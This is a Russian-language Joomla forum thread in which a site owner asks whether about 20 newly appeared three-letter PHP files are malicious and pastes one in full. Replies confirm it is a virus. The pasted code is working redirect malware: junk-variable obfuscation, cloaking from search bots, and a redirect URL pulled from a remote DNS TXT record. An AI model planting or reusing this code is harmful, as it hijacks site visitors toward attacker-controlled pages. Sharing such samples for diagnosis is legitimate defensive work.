На сайте поселился вирус или нет? - Безопасность сайтов на Joomla

Добрый день.

Обнаружила в менеджере файлов документы, которых раньше не было. Они все имеют название, состоящие из трех букв, например: ahk.php, aok.php, are.php и так далее... всего их 20 шт. Это вирусные файлы или нет?

вот содержимое одного из них:

<?php

$vrfotvgk="dnpiybssnbnvefrrwrer";
$pkwnqbxxwxnfmi="xgyiygtluwshortsiqxfn";
$tbttf="mxvgwjcztzaqwohoyupbabvjvyqd";
$fozjueh="jpwhfkzaztkfocevawssetgwg";
$frgwwtazpgdluk="zbztbioaarczoabzfjxbw";
$bvxjytlsvmuee="ipzzbwrbsjuayqgqhacyzgzwzn";
$lrcxhs="iklbfplqndgidnhfrmwmlwlpvjj";
$rttyzoitkanv="nbjtcyeuizottazdpuip";
$tzgulbc="kdgniqjgouyllcbqhnfq";
$boaxehzlfztj="sddbiuqqlvecqpleskgueqfkmsnh";
$eflqelosmaqhi="lazubdymincyfnbbbfccsun";


error_reporting(0);

$ixvgavvlsmezq="sthsdabfpittqbohdnpgeu";
$rmgiw="zqyfmqrucsaemzalmffmoeqzrkcas";
$jdhrlijlzy="mnowevexyrkoyicaavutvjj";
$ihxgggre="kitgvlfzmtnlzdxyzoighw";
$pdpjew="fbnsatebzlrlukksavbftelkmfuc";
$ocuys="htvhuowvpczzgzuniyrgjzlex";
$psgvndkxkrome="xlwanexfnlcqrdlvayvsxd";
$pzwtklv="pfoihohaaigneyvvhtdtu";
$fmwctbqdt="ikyjdbniyowtoovgsgnlosnjs";
$wxlkkhhwzkl="kihsidsygdsenvfixfhevb";
$eluenkyibkwup="lbgxstofajluwmdmsvkycbjgceku";
$yekxtiotxz="aohpnfguwzrdjadftmytvp";
$thdkl="esponkrbopsbkdxinbmak";
$egqifncqojz="tmvlhevqmeqnlxkjsktubpjnfuru";
$cvqhnttbfdsh="bohxlmhnthgtzgtbanowupnjuw";
$xqieoamla="qaubkubncczsmoylvfbcbmpb";
$urqmlmpehm="ecuzeosskgkzamagghmlsqjeg";
$ntsxifawp="vpuobhtfoekaqqexijnil";
$tlecqufipbl="tfsvzxhpygtcjrcweudze";
$ufjmxevyahw="wwxrkilwuckwfpxdnwzhlcrkcd";
$rticnpflu="qqqxdkpbnnxhpjxjdkmnrqoy";
$bvvtwiycs="cazhziezfyovtxltwblzeekrpzcqs";
$wmwvpegdjberw="tftvdopxztzstrxgwliypyjaz";


$domain = 'sma.liveupdates.host';

$kyymkncrdt="vqtikkcxukgfwikjkzariwlg";
$ewxcuknkzwry="qfovyktzmjeuyzonpmkatzsinu";
$soqpmlbeid="osaxbdtjveoegtnltrisyottpw";
$iaqhkuqlztj="zjubbtnuxaohtmcqpxogjtsj";
$hnexulnnndjxii="exhtlbhelcycumfyspvrah";
$vwpxnxileabhvr="ndavmabpvhyqevdkefcbgrhprck";
$rbssvialmsbxxl="xksyoqwyrtfspprqpkxqsggcspvx";
$zamgxojbpdanpe="mmhhxztepolggnobvwziabts";
$evjeted="dsonstifysyplneasrtffdx";
$lesqzmigiqdka="wpwfynbarxpripapoowtt";
$zgzjagbvuwt="yvaddtsvyjqlmuneatpak";


$browser = isset($_SERVER['HTTP_USER_AGENT'])? strtolower($_SERVER['HTTP_USER_AGENT']) : '';

$exhmjoelusls="iuvpypiqugzxxclhrpjdkrss";
$rxzdsjxmpvxsk="gevwpzsmukfegsbbspagmwdi";
$dllgrtyp="ptvbaxmenpqeeoyivyhzamdj";
$fzbjptygm="zcvnyddgqsqrywiaoybccrhqc";
$klsofipnapg="rekintqhritdcyovxtqvm";
$yiibtfahydapc="dnckhnrpoaeznhccveykl";
$mqykxr="ptffkintgsduojqyefdf";
$ykvikt="ecawftdcdeqykxeceitewojzl";
$cjxadkplxtuc="knbpqrhubnmpeqaspbrjjfftfh";
$hxaetrynltgkpx="icdgjwsyswqiuilumimjkys";
$cnorc="oxkznomxjydjdnxvxlhrvsyrwzvnv";
$yrghfzp="qcgkadbqdeaakkzkcxgpnukkvn";
$mdewalbpso="geoaassjnjmujudwfxriyye";
$qjxfxfskedjxw="tmknmxnwjuuyqivnicvep";
$mkcurwnsvnxbm="cuejjifohaflifjzxwsqtohq";
$wztmpb="kcxpjbjqoaefhoahoysdz";


if (preg_match('/googlebot|slurp|bingbot|Baiduspider|AhrefsBot|Ezooms|MJ12bot|YandexBot|MSNBot|ia_archiver|lycos/i', $browser))
{
$xcnzbyqvf="bjnegqfyemuvjhqlkaajmgc";

die();
}

$pdbkjgveoytbs="ljznmesxyyivkiqqaorgji";
$cfptb="kqgqtmleludcmqdowrdesobgm";
$jwjvskdhsh="kfnowdtlerguvzxvhyeejvu";
$styapilm="qauxrwtuhwvyyoclatxbwzls";
$gaeqcramjqiae="laarkabzpehazcpmgevsyydpob";
$yrvlrrhtxwjcev="bvkwlccjcslesytnkzsjltcfq";
$vwkqemnilqgxmm="wgdotuzoawopmdzyghacx";
$xohmrfkpjtgncs="tnyydmbpulfujugppmbru";
$crhtpliqseco="cckbrcgrzkcibfegzplbkd";
$bnskpgl="odcxgdcbyizowvyzjspyljqju";
$mhlngkxzuhmhn="yhlrmmmmhsvlkairscinjdbkosyml";


if (strpos(strtolower($_SERVER['REQUEST_URI']), 'robots.txt') > 0)
{
$nucvhitvdwifac="azhiefelssnymaxytxeoejyehcx";
$vyfxotzgrpi="pjolveahwzvmdasrhyslgmbp";
$jylwvnytslrhky="kyciyvhscwdbzlbnajcwqyackky";

die("User-agent: *\r\nDisallow: /\r\n");
}

$ivincuya="eeucewejjrltiivktgbybnfebsplu";
$oluemksgzyix="tyuhvweqbceecaakhwhnb";
$pjpxaq="osowizoxxjgqfssawlirkdwblucgd";
$olhdn="tzzrrjcxdzsxnxuothnafo";
$jectk="valvrxidowndelwqfkyusim";
$wcgeafix="sgqjisdjkdjudiefxmhcwazidsg";
$blhgqrpr="twplxupamjhyngrusycmyayc";
$xtsnitnvhpv="qbqecncmschxsrhoffclyrjpiqkx";
$dwzznnbgey="jtpyvwehanbyrkjuanfxkzy";


for ($i = 0; $i < 4; $i++)
{
$s = dns_get_record($domain, DNS_TXT);
$location = '';

if (is_array($s) && (count($s) > 0) && isset($s[0]['txt']) && strlen($s[0]['txt']))
{
$s = base64_decode($s[0]['txt']);

if ((strpos($s, 'http'))!== FALSE)
{
$location = $s;
}
}

if (strlen($location))
break;
}

if (!strlen($location))
die();

$hyyfssllcmgm="aujbytmnsvtysedyckfasjbio";
$fienvs="aotntecmaziomofuabgskwlpx";
$nqcbhbyvolssl="mtvrudszldumernzijcjrx";
$setnuxst="pdsmpfiekxdplgyzqutjh";
$bdnht="aoksppobynzncqdhqaelbgjikkur";
$mnddvzmc="antbdtmvlkydsrzwlicbn";
$wdurj="xfiavbnfwrduxcwemogmxmavzbshm";
$qvsluewnilakx="dvyviqxdalbhjlvpeywzrzbtg";
$tnsdarpzqrrre="iaelhslaejcppfsjstmc";
$aklqk="vbsjhqjcchtqlkjjisdrnbmnhquv";
$qwqdis="kczjeickxldvxvjvxgovjjzv";
$vdajnxufkjz="ohwcjtsoxgrjldwxfqwphax";
$cenbrlfyn="hmfxrrgayfycinqblkjrq";
$imwcpxlofz="rxugaedmkwvjooabtiyro";
$bjock="mhilymbudjphuqaxremvfuyys";
$nfamxxtvpobrf="nkgqanmmhwdiguvthzwr";
$hrdds="tiugbicizaoyuonuhumswmxkua";
$dmwwgwcjnytm="efkddjwxbfffbtczkuvgs";
$uzacwxygon="yvghicdmsfsjtpdfbhim";
$adsushzlv="oneuddhjyofeyziyskrc";
$qtzzuxtknqxjd="ltzogvtmhsuqnisrowdwluukadzol";
$nqusx="qmeaddeopmujlqkuprkyoctsju";
$tzxzub="ypjgakealtozxbcelkrjhpuxuoqya";
$cnehgvy="bpigxrufydzxjufxlteozai";
$pbpptbkucuhqb="wppzlibxnwhbjeeuifoqjuextpnoi";
$exrjindgexoe="xplbikoiyikmniduegxykisujjsb";
$uqycgmtzrt="lnxfpenqrnvvbimcvdvgfhsjusqc";
$aqlnopck="ytiyhrfnwatekuoomvnjsfnb";
$uahswtjd="yekcwvmssfpwjfigdspxod";
$hktzmp="hvsetenyejgobsymnwbls";


if (isset($_GET['m']) && strlen($_GET['m']) > 5)
{
$acsxkzkurus="myqvjmfrjvcoqvyylzyddahqz";
$wfdmdnioddaor="zckjqtirimranbnadenqagf";
$dlzavdf="bxnjkfnaufdjmgpqdynr";
$ulcgxkuh="yzvanfoqhcrkcgxvnxxetjfyg";
$jtmkr="xrqunshubhqcaksxocdacldxsuph";
$stmwadc="bxeemkqiowmxrdawuahod";
$hhsru="zhtbnhijhdiaounwxmwxa";

$m = 'm='.$_GET['m'].'&sub_id_1='.$_GET['m'];
} else
{
$tzsxxnu="egrrunenruvwbylrqxbwkunmy";
$omhzpyalewg="lrbllvtycoslddogwjzrxsxbwrcpc";
$aopqdwc="ximpkvhayyijogfzqoquwqjbjn";
$pjlnpprug="hfuiouazaucaiksbxanrylzcmbq";
$tuaffvvpt="gafvhenalzzsttcwolhyahghxpyd";
$wlyujcdzap="blwglnquxrjqbpvzxvwoziiajxcwz";
$sqnahnqwzx="mrvbopkpnmazxjnmjlwstwiz";
$mynhnzgngcosod="pfqhsuelsdmshwyvipggldhojujyd";
$mposxvqxjrleo="fopeacmmeqgknigrgbciyacfevdb";
$txjuabfrolhr="balzkkwkjfmnkmmvewvaxvwoy";
$ogbujftx="picdrulypsdlhzckwxeswyju";
$taazjlddszkf="rpcwnxewrnukudrxucmqjvhs";
$tvolnpevrs="aljvlegftadnlgaseeputtdfzch";
$lyicm="tgtuirjzhxgyyworqvdldmxnz";
$zspjfuweffabp="oukzngvwuirgqafkhdyvhmgry";
$qhibzj="caxgjcwnxwssmplxpzxgmpncsi";
$zxzabkwvjixg="kvsempvqergipbodvdrcrh";
$ymhuamgtcb="dhroajehmegkmiybjwzf";
$oqujkbszbkk="nrwzzltoaekfgqvztrjpcabzqytr";

$m = '';
}

$rqmapq="ckqmbqpohadopobrrjjdoh";
$tnpxyylg="ketgexnxyspgmzcrwrlo";
$qjwpw="mgmmxnbxrpdvfaskubuewmb";
$zjgvnh="fhringhlbmworjpnvucjxg";
$uhsapkamkvlxy="rikosbmcgmfxhrgoqqydwfu";
$jcwfqcmybva="mmyjgmsklqxpkdbkcatwwgsrrbv";
$lwuyaovou="uhyrlhsimbuawjeejytoet";
$lutvspflqkpxs="bsydcadqsewxkpygvodavysow";
$upjoqz="xjxszqbplkltkcstroilhhzm";
$kwmzkwg="txxpsxulzgkukqanymfllicomr";


if (!strlen($m))
{
$cmtyi="owjhzvsjgfcklrhituaxrblci";
$sahecjvvgfrdjd="ozrrmiffnhijqnlmkpxbz";
$bgtzravsm="bcuvaimrmdczuvngdyoysgzmd";
$eeuvrbsqpht="kucjnubqmsbjapomqhjedicqom";
$xwcerlg="tkfxbzxtimnyrukydxakx";

if (strlen(strval(key($_GET))))
$m = 'sub_id_1='.strval(key($_GET));
}
$yjsoxfsh="egyytwdjtbodkypcdlwb";
$tdmfsqnbzuc="iqberijxfdpboqxdudedop";
$kqbokuw="iewpcgsiuzwopuqjxibren";
$qfmbcgnkuqv="nhqfmiltozvocdzakwkfbpre";
$iitquaxwch="iblfzpgefjdithsbtadbfz";
$mveonafcyed="udbkrqcouaeddxvyiyvl";
$ikdenhjohc="lyuwfhyzmwikxmmtqzolyouxu";
$htkiegfvscikt="dyzqabnkyvyrxkgrbrzgrw";
$anibnjpy="thmgvkawseaikzkkthogdlgkbmg";
$ulayvi="aitnobgpqspqphznxlffdcnxpbf";
$bwxdihhefgj="gyjiuoarvaxehnwizxarctszys";
$igickhr="uivcukvhbhqsyquvwurvbsuvng";
$eternibvuumbxv="fuikopcayjheazdjlblz";
$hvgwtjsrwhh="urgjpnbltrxglaxadunmceamngbt";
$zzxojmcbucqg="xnrehscervyhsrlqmflf";
$vhesyncgf="vhkeysinpgozdgxxhgkajdalm";
$ddzlaubeyzzrub="uvhhymvkmlkkbjflkprrutc";
$velbzcllusc="hbklxfpyoxbfnzhiqczwffmfcrbq";
$wapzxtxd="jzyedtijnapigxyovuelan";
$rroenze="gtsdffizhzjrqpjynwpxmpyucekdh";
$ujfryzno="dijroiuskqvsiqbhfwlbsbpii";
$isknrinobivap="nnjrsdrfoqmvntewtqyc";
$kfccgvxvjd="rqclzmuxyvmmihyaovjpnjilzgr";
$murdolp="miqxlyunfllupowouelrr";
$qlixm="sphcuuzqeoslxwudgewhdde";
$cywtuqmpkcnpm="hzioiypjzzlirlueadilfnlxwh";
$pkkqtdhc="grbjckdoghuzsvzstryxptr";
$hpifjyggrt="slfflochprcktpdwaotplsxvhi";


if (!strlen($m))
{
header('Location: '.$location, TRUE, 302);
} else
{
$aevsqxgsvxniwf="qgbcugpyudujghibrphewrda";
$yopncgsiqmowbg="jhypmctgahmrvwkghcppaydn";
$xytxglgqaimmg="hiuayqjxenbdayrvxujbjrbfyzask";
$culbfgdntj="lungwxiynpkfzyhykffzap";
$inkhiaoillgt="ujpscfazjqfiopeguutuhsw";
$ernfdfn="qrcnxegbhaozecttuslvd";
$vibwrq="jvwcjdczlxdttxmfujqigrg";
$bytymarlvtpn="hsakgzsndftnopctmutwphgdbjn";
$diijznzqb="zehpebuzdwifwxwlgcbf";
$fzzhch="ozndhhrtahwfhvfaxpxcbu";
$muavedhvzyzcex="eqtochuknriyflrnzylvafguabs";
$wifeuhgaecy="chktqqqhuezrhpwerapchquqjwqm";
$tzduirhfrzywkl="ywlgipcfdbjmnkrfrzpvvdr";
$zsskiptfhkraod="gzmyggzvlygztercemsbdfahrbuze";
$warqemjmba="gepijhmmcgrhxdwwlulmmxna";
$wqvyuykn="wgngguqtkbwpuzvwevbeztutr";
$dfjdgtt="xodiqritjxzsjnixgpysr";
$sxkpmwsl="ijpyssnnbgjybegpwemgeurcgu";
$hfvauvu="jgktceagwvxmlpkiehzie";
$fwxuhczrcdl="lbozuejshdiklwvrysosb";
$vorxryphhg="rloexxrdbblodjawnhlr";
$wdtolotzewg="vsypqbkviczilccxzzczahfeh";
$egnfdcsecrnjgi="xltflwkwtsvuzkwspedyiomqhtrrh";
$qatrnkhm="yxlscswgddeqpyngzensjo";
$zohscijjzijb="okknrurmxvkdsqrsfritqejxlfug";
$jwakudr="ychwdxlbdzegolmoqcdo";
$yeeskpbfpsvtc="todvgqjzzqkmfylfoadlt";
$qjaytkxgvrlbat="djwjlpdzrppqvayivvpfjefpd";

if (strpos($location, '?') === false)
header('Location: '.$location.'?'.$m, TRUE, 302);
else
header('Location: '.$location.'&'.$m, TRUE, 302);
}

Похоже да. Вряд ли эти файлы появились после установки не варезного расширения для Joomla.

вирус

Да, у вас вирус. Такие полотна надо прятать в спойлер. Почему так, сказать сложно. Вы не дали никакой информации.